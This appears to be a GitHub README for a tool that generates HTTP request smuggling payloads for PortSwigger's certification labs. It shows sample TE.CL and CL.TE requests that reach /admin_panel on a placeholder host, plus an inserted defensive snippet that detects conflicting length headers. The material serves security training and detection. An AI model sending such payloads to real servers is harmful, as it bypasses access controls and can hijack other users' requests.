dhmosfunk / simple-http-smuggler-generator

This tool was developed for the Burp Suite practitioner certificate exam and HTTP Request Smuggling labs. Its most important features are TE.CL vulnerability exploitation and an automatic chunk size generator. Feel free to contribute and make a PR ;) Have fun exploiting these labs >.<

Introduction

This tool was developed for the Burp Suite practitioner certificate exam and HTTP Request Smuggling labs. Its most important features are TE.CL vulnerability exploitation and an automatic chunk size generator, so you don't have to calculate the chunk size for the second (malicious) request. This tool is simple but very useful.

The inspiration for this tool was the HTTP Request Smuggler extension for Burp Suite; to use that extension you must have a valid Burp Suite license.

For the valid chunk generator (TE.CL), I found the source code in the HTTP Request Smuggler extension. You can find the source code below.

TE-CL | PortSwigger HTTP Request Smuggler Resource
CL-TE | PortSwigger HTTP Request Smuggler Resource

⚠️ Attention: this tool does not offer automated exploitation. You have to identify the injection point and exploit it manually!

Installation

$ git clone https://github.com/dhmosfunk/simple-http-smuggler-generator.git
$ cd simple-http-smuggler-generator
$ python3 tool.py --help

Usage

Sometimes you need to append more HTTP headers to the malicious request for different purposes, e.g. to bypass localhost restrictions. You can add your own HTTP headers in /lib/clte.py or /lib/tecl.py.

$ python3 tool.py --help
usage: tool.py -v clte/tecl -host xxxxxxxxxx.net  -a admin_panel -m GET

options:
  -h, --help            show this help message and exit
  -v VULNERABILITY, --vulnerability VULNERABILITY
                        Possible values CLTE or TECL
  -host HOSTNAME, --hostname HOSTNAME
                        Target HOSTNAME
  -a ACTION, --action ACTION
                        ex. admin_panel
  -m METHOD, --method METHOD
                        Request Methods [GET, POST]

Generating TE.CL Request

$ python3 tool.py -v tecl -host xxxx.net -a admin_panel -m get

---[TE.CL Payload Generated]---

Transfer-Encoding: chunked
Content-Length: 3

75
GET /admin_panel HTTP/1.1
Host: xxxx.net
Content-Type: application/x-www-form-urlencoded
Content-length: 15

x=1
0

---[TE.CL Payload Generated]---

[INFO]> Dont forget the \r\n after 0
Also disable the auto-update Content-Length from menu

Send TE.CL Request

[Screenshot: sending the generated TE.CL request]
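For defenders reviewing proxy or WAF captures, the check below flags the framing ambiguity that the TE.CL output above relies on: it compares the body length declared by Content-Length with the length a chunked parser would consume. It is an added example, not part of this tool or of the HTTP Request Smuggler extension; the function names and the outer `POST /` request line in the sample are assumptions.

```python
import re

def split_request(raw: bytes):
    """Split a raw HTTP/1.1 request into a {name: [values]} header map and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:              # skip the request line
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers, body

def chunked_length(body: bytes):
    """Bytes a chunked parser consumes, or None if malformed (trailers unsupported)."""
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        token = body[pos:eol].split(b";")[0].strip()  # drop chunk extensions
        if eol < 0 or not re.fullmatch(rb"[0-9A-Fa-f]+", token):
            return None
        size = int(token, 16)
        pos = eol + 2 + size                          # skip size line and chunk data
        if body[pos:pos + 2] != b"\r\n":
            return None
        pos += 2
        if size == 0:                                 # last chunk ends the body
            return pos

def framing_findings(raw: bytes):
    """Return the reasons a request's body length is ambiguous (empty if none)."""
    headers, body = split_request(raw)
    cl = headers.get(b"content-length", [])
    te = headers.get(b"transfer-encoding", [])
    findings = []
    if cl and te:
        findings.append("Content-Length and Transfer-Encoding both present")
    if te:
        te_len = chunked_length(body)
        if te_len is None:
            findings.append("malformed chunked body")
        elif cl and cl[0].isdigit() and int(cl[0]) != te_len:
            findings.append(f"length mismatch: Content-Length={int(cl[0])}, chunked={te_len}")
    return findings

# Constructed sample: the TE.CL output shown above; the outer request line is assumed.
INNER = (b"GET /admin_panel HTTP/1.1\r\nHost: xxxx.net\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n"
         b"Content-length: 15\r\n\r\nx=1")
SAMPLE = (b"POST / HTTP/1.1\r\nHost: xxxx.net\r\nTransfer-Encoding: chunked\r\n"
          b"Content-Length: 3\r\n\r\n75\r\n" + INNER + b"\r\n0\r\n\r\n")
```

`len(INNER)` is 117 bytes, which is the `75` (hex) chunk size in the generated output; a front end that rejects or normalizes any request returning a non-empty list here removes the disagreement between the two parsers.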

Generating CL.TE Request

$ python3 tool.py -v clte -host xxxx.net -a admin_panel -m get

---[CL.TE Payload Generated]---

Transfer-Encoding: chunked

0

GET /admin_panel HTTP/1.1
Host: xxxx.net
X-Ignore: X


---[CL.TE Payload Generated]---

Send CL.TE Generated Request

[Screenshot: sending the generated CL.TE request]
